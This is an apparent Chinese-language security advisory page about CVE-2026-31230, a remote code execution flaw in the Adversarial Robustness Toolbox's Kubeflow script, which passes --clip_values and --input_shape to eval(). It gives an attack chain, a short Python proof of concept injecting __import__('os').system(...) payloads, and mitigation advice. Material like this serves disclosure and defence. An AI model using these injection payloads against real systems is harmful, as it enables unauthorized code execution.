IPBUF安全漏洞报告
English
CVE-2026-31230 CVSS 9.8 严重

CVE-2026-31230 ART远程代码执行漏洞

披露日期: 2026-05-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-31230
漏洞类型
远程代码执行
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Adversarial Robustness Toolbox (ART)

相关标签

RCE代码执行命令注入ARTAdversarial Robustness ToolboxKubeflowCVE-2026-31230

漏洞概述

Adversarial Robustness Toolbox (ART) 在1.20.1及之前版本中存在严重的命令行参数注入漏洞。该漏洞影响其Kubeflow组件 robustness_evaluation_fgsm_pytorch.py。由于该脚本在处理 --clip_values 和 --input_shape 参数时,直接调用了不安全的 eval() 函数进行解析,导致攻击者可以通过精心构造的参数注入并执行任意Python代码。若攻击者能控制这些参数(例如通过流水线配置),即可实现远程代码执行,完全控制受影响系统。

技术细节

该漏洞的根源在于 robustness_evaluation_fgsm_pytorch.py 脚本使用了 Python 内置的 eval() 函数来处理用户输入的命令行参数。具体来说,当脚本解析 --clip_values 和 --input_shape 这两个参数时,未对输入字符串进行任何过滤或验证,直接传递给 eval() 执行。eval() 函数会将字符串作为有效的 Python 表达式求值。攻击者可以利用这一特性,在参数中嵌入恶意 Python 代码(如 __import__('os').system('id'))。当脚本运行时,这些恶意代码会在当前进程的上下文中被执行,从而导致任意代码执行。由于该脚本可能用于自动化流水线,攻击者无需用户交互即可远程触发该漏洞。

攻击链分析

STEP 1
1. 侦察
攻击者识别目标正在使用 Adversarial Robustness Toolbox (ART) 的 Kubeflow 组件,并确认版本在 1.20.1 及以下。
STEP 2
2. 武器化
攻击者构造包含恶意 Python 代码的字符串,利用 eval() 函数的特性,设计能够执行系统命令的参数值(例如 --clip_values)。
STEP 3
3. 投递
攻击者通过控制流水线配置、API 调用或脚本执行环境,将包含恶意代码的参数传递给 robustness_evaluation_fgsm_pytorch.py 脚本。
STEP 4
4. 利用
脚本启动并解析参数,当调用 eval() 处理 --clip_values 或 --input_shape 时,恶意 Python 代码被解析并执行。
STEP 5
5. 达成目标
成功获取目标系统的服务器权限,执行任意命令,可能导致数据泄露、系统破坏或部署勒索软件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-31230 # Exploit usage of eval() on --clip_values or --input_shape import subprocess # Malicious payload to execute arbitrary Python code # Example: spawning a shell or writing a file payload = "__import__('os').system('touch /tmp/pwned')" # Construct the command to run the vulnerable script command = [ 'python', 'robustness_evaluation_fgsm_pytorch.py', '--clip_values', f"({payload})", # Injecting code into the argument '--input_shape', '(1, 28, 28)' ] # Execution leads to RCE # subprocess.run(command)

影响范围

Adversarial Robustness Toolbox (ART) <= 1.20.1

防御指南

临时缓解措施
在未进行版本升级之前,建议限制 robustness_evaluation_fgsm_pytorch.py 脚本的执行权限,仅允许受信任的用户或服务调用。同时,对传入的 --clip_values 和 --input_shape 参数实施严格的白名单校验,确保输入仅包含预期的数字和符号(如括号、逗号),严禁包含函数调用或特殊字符。此外,应在沙箱环境中运行该脚本以限制潜在的代码执行影响。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表